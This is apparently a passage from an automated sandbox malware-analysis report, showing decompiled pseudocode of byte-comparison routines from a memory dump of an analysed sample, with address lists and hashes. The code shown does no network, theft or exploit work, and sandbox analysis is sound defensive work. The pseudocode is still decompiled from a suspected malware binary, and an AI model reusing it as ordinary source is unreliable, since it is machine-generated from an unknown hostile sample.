											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

0x00414a7c
0x00414a7c
0x00414a82
0x00414b02
0x00414b04
0x00414b06
0x00000000
0x00000000
0x00414b0c
0x00414b12
0x00414b91
0x00414b93
0x00414b95
0x00000000
0x00000000
0x00414b9b
0x00414ba1
0x00414c20
0x00414c22
0x00414c24
0x00000000
0x00000000
0x00414c2a
0x00414c30
0x00414caf
0x00414cb1
0x00414cb3
0x00000000
0x00000000
0x00414cbf
0x00414d3f
0x00414d41
0x00414d43
0x00000000
0x00000000
0x00414d49
0x00414d4f
0x00414dce
0x00414dd0
0x00414dd2
0x00000000
0x00000000
0x00414dd8
0x00414dde
0x00414e5d
0x00414e5f
0x00414e61
0x00000000
0x00000000
0x00414e6f
0x00414e71
0x00414a54
0x00414a5c
0x00414a5e
0x0041463a
0x00414642
0x00414644
0x00414655
0x00414655
0x0041424a
0x00414fa6
0x00414fa6
0x00414a6b
0x00414a71
0x00414e8a
0x00414e8a
0x00000000
0x00414a77
0x00000000
0x00414a77
0x00414a71
0x00414e7e
0x00414e84
0x00000000
0x00000000
0x00000000
0x00414e84
0x00414de7
0x00414de9
0x00414e00
0x00414e08
0x00414e0a
0x00414e21
0x00414e29
0x00414e2b
0x00414e42
0x00414e4a
0x00414e4c
0x00414e59
0x00414e59
0x00000000
0x00414e4c
0x00414e38
0x00414e3c
0x00000000
0x00000000
0x00000000
0x00414e3c
0x00414e17
0x00414e1b
0x00000000
0x00000000
0x00000000
0x00414e1b
0x00414df6
0x00414dfa
0x00000000
0x00000000
0x00000000
0x00414dfa
0x00414d58
0x00414d5a
0x00414d71
0x00414d79
0x00414d7b
0x00414d92
0x00414d9a
0x00414d9c
0x00414db3
0x00414dbb
0x00414dbd
0x00414dca
0x00414dca
0x00000000
0x00414dbd
0x00414da9
0x00414dad
0x00000000
0x00000000
0x00000000
0x00414dad
0x00414d88
0x00414d8c
0x00000000
0x00000000
0x00000000
0x00414d8c
0x00414d67
0x00414d6b
0x00000000
0x00000000
0x00000000
0x00414d6b
0x00414cc9
0x00414ccb
0x00414ce2
0x00414cea
0x00414cec
0x00414d03
0x00414d0b
0x00414d0d
0x00414d24
0x00414d2c
0x00414d2e
0x00414d3b
0x00414d3b
0x00000000
0x00414d2e
0x00414d1a
0x00414d1e
0x00000000
0x00000000
0x00000000
0x00414d1e
0x00414cf9
0x00414cfd
0x00000000
0x00000000
0x00000000
0x00414cfd
0x00414cd8
0x00414cdc
0x00000000
0x00000000
0x00000000
0x00414cdc
0x00414c39
0x00414c3b
0x00414c52
0x00414c5a
0x00414c5c
0x00414c73
0x00414c7b
0x00414c7d
0x00414c94
0x00414c9c
0x00414c9e
0x00414cab
0x00414cab
0x00000000
0x00414c9e
0x00414c8a
0x00414c8e
0x00000000
0x00000000
0x00000000
0x00414c8e
0x00414c69
0x00414c6d
0x00000000
0x00000000
0x00000000
0x00414c6d
0x00414c48
0x00414c4c
0x00000000
0x00000000
0x00000000
0x00414c4c
0x00414baa
0x00414bac
0x00414bc3
0x00414bcb
0x00414bcd
0x00414be4
0x00414bec
0x00414bee
0x00414c05
0x00414c0d
0x00414c0f
0x00414c1c
0x00414c1c
0x00000000
0x00414c0f
0x00414bfb
0x00414bff
0x00000000
0x00000000
0x00000000
0x00414bff
0x00414bda
0x00414bde
0x00000000
0x00000000
0x00000000
0x00414bde
0x00414bb9
0x00414bbd
0x00000000
0x00000000
0x00000000
0x00414bbd
0x00414b1b
0x00414b1d
0x00414b34
0x00414b3c
0x00414b3e
0x00414b55
0x00414b5d
0x00414b5f
0x00414b76
0x00414b7e
0x00414b80
0x00414b8d
0x00414b8d
0x00000000
0x00414b80
0x00414b6c
0x00414b70
0x00000000
0x00000000
0x00000000
0x00414b70
0x00414b4b
0x00414b4f
0x00000000
0x00000000
0x00000000
0x00414b4f
0x00414b2a
0x00414b2e
0x00000000
0x00000000
0x00000000
0x00414a84
0x00414a84
0x00414a88
0x00414a8c
0x00414a8e
0x00414aa5
0x00414aa5
0x00414aa9
0x00414aad
0x00414aaf
0x00414ac6
0x00414ac6
0x00414aca
0x00414ace
0x00414ad0
0x00414ae7
0x00414ae7
0x00414aeb
0x00414aef
0x00414af1
0x00414af7
0x00414afa
0x00414afe
0x00414afe
0x00000000
0x00414af1
0x00414ad6
0x00414ad9
0x00414add
0x00414ae1
0x00000000
0x00000000
0x00000000
0x00414ae1
0x00414ab5
0x00414ab8
0x00414abc
0x00414ac0
0x00000000
0x00000000
0x00000000
0x00414ac0
0x00414a94
0x00414a97
0x00414a9b
0x00414a9f
0x00000000
0x00000000
0x00000000
0x00414a9f
0x00413e75
0x00413e75
0x00000000

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 25e239e0fb30427d8d87402450343b4e7aae652c58a160f02a4417542b073acd
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 9FD18F73C0AAB34A8735852D40686BBEE626FD178131FC3E2DCD43F389D62A9D8095D4

Uniqueness

Uniqueness Score: -1.00%

Function 0041465C Relevance: .4, Instructions: 378
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0041465C(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}

0x0041465c
0x0041465c
0x00414662
0x004146e1
0x004146e3
0x004146e5
0x00000000
0x00000000
0x004146eb
0x004146f1
0x00414770
0x00414772
0x00414774
0x00000000
0x00000000
0x0041477a
0x00414780
0x004147ff
0x00414801
0x00414803
0x00000000
0x00000000
0x00414809
0x0041480f
0x0041488e
0x00414890
0x00414892
0x00000000
0x00000000
0x00414898
0x0041489e
0x0041491d
0x0041491f
0x00414921
0x00000000
0x00000000
0x0041492d
0x004149ad
0x004149af
0x004149b1
0x00000000
0x00000000
0x004149b7
0x004149bd
0x00414a3c
0x00414a3e
0x00414a40
0x00000000
0x00000000
0x00414a4e
0x00414248
0x0041424a
0x00414fa6
0x00414fa6
0x00414a5c
0x00414a5e
0x0041463a
0x00414642
0x00414644
0x00414655
0x00414655
0x00000000
0x00414644
0x00414a6b
0x00414a71
0x00414e8a
0x00000000
0x00414e8a
0x00000000
0x00414a77
0x004149c6
0x004149c8
0x004149df
0x004149e7
0x004149e9
0x00414a00
0x00414a08
0x00414a0a
0x00414a21
0x00414a29
0x00414a2b
0x00414a38
0x00414a38
0x00000000
0x00414a2b
0x00414a17
0x00414a1b
0x00000000
0x00000000
0x00000000
0x00414a1b
0x004149f6
0x004149fa
0x00000000
0x00000000
0x00000000
0x004149fa
0x004149d5
0x004149d9
0x00000000
0x00000000
0x00000000
0x004149d9
0x00414937
0x00414939
0x00414950
0x00414958
0x0041495a
0x00414971
0x00414979
0x0041497b
0x00414992
0x0041499a
0x0041499c
0x004149a9
0x004149a9
0x00000000
0x0041499c
0x00414988
0x0041498c
0x00000000
0x00000000
0x00000000
0x0041498c
0x00414967
0x0041496b
0x00000000
0x00000000
0x00000000
0x0041496b
0x00414946
0x0041494a
0x00000000
0x00000000
0x00000000
0x0041494a
0x004148a7
0x004148a9
0x004148c0
0x004148c8
0x004148ca
0x004148e1
0x004148e9
0x004148eb
0x00414902
0x0041490a
0x0041490c
0x00414919
0x00414919
0x00000000
0x0041490c
0x004148f8
0x004148fc
0x00000000
0x00000000
0x00000000
0x004148fc
0x004148d7
0x004148db
0x00000000
0x00000000
0x00000000
0x004148db
0x004148b6
0x004148ba
0x00000000
0x00000000
0x00000000
0x004148ba
0x00414818
0x0041481a
0x00414831
0x00414839
0x0041483b
0x00414852
0x0041485a
0x0041485c
0x00414873
0x0041487b
0x0041487d
0x0041488a
0x0041488a
0x00000000
0x0041487d
0x00414869
0x0041486d
0x00000000
0x00000000
0x00000000
0x0041486d
0x00414848
0x0041484c
0x00000000
0x00000000
0x00000000
0x0041484c
0x00414827
0x0041482b
0x00000000
0x00000000
0x00000000
0x0041482b
0x00414789
0x0041478b
0x004147a2
0x004147aa
0x004147ac
0x004147c3
0x004147cb
0x004147cd
0x004147e4
0x004147ec
0x004147ee
0x004147fb
0x004147fb
0x00000000
0x004147ee
0x004147da
0x004147de
0x00000000
0x00000000
0x00000000
0x004147de
0x004147b9
0x004147bd
0x00000000
0x00000000
0x00000000
0x004147bd
0x00414798
0x0041479c
0x00000000
0x00000000
0x00000000
0x0041479c
0x004146fa
0x004146fc
0x00414713
0x0041471b
0x0041471d
0x00414734
0x0041473c
0x0041473e
0x00414755
0x0041475d
0x0041475f
0x0041476c
0x0041476c
0x00000000
0x0041475f
0x0041474b
0x0041474f
0x00000000
0x00000000
0x00000000
0x0041474f
0x0041472a
0x0041472e
0x00000000
0x00000000
0x00000000
0x0041472e
0x00414709
0x0041470d
0x00000000
0x00000000
0x00000000
0x00414664
0x00414664
0x00414667
0x0041466b
0x0041466d
0x00414684
0x00414684
0x00414688
0x0041468c
0x0041468e
0x004146a5
0x004146a5
0x004146a9
0x004146ad
0x004146af
0x004146c6
0x004146c6
0x004146ca
0x004146ce
0x004146d0
0x004146d6
0x004146d9
0x004146dd
0x004146dd
0x00000000
0x004146d0
0x004146b5
0x004146b8
0x004146bc
0x004146c0
0x00000000
0x00000000
0x00000000
0x004146c0
0x00414694
0x00414697
0x0041469b
0x0041469f
0x00000000
0x00000000
0x00000000
0x0041469f
0x00414673
0x00414676
0x0041467a
0x0041467e
0x00000000
0x00000000
0x00000000
0x0041467e
0x00413e75
0x00413e75
0x00000000

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: e492689855932e246beed80518a5e0354f6c67d216bb37e94c6bc5de9dc4e9b7
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: DFD1BF73C0AAF34A8735852D40681BBEA626FD179131FC3E2CCE43F389D62A5D8196D4

Uniqueness

Uniqueness Score: -1.00%

Function 00414250 Relevance: .4, Instructions: 361
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00414250(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
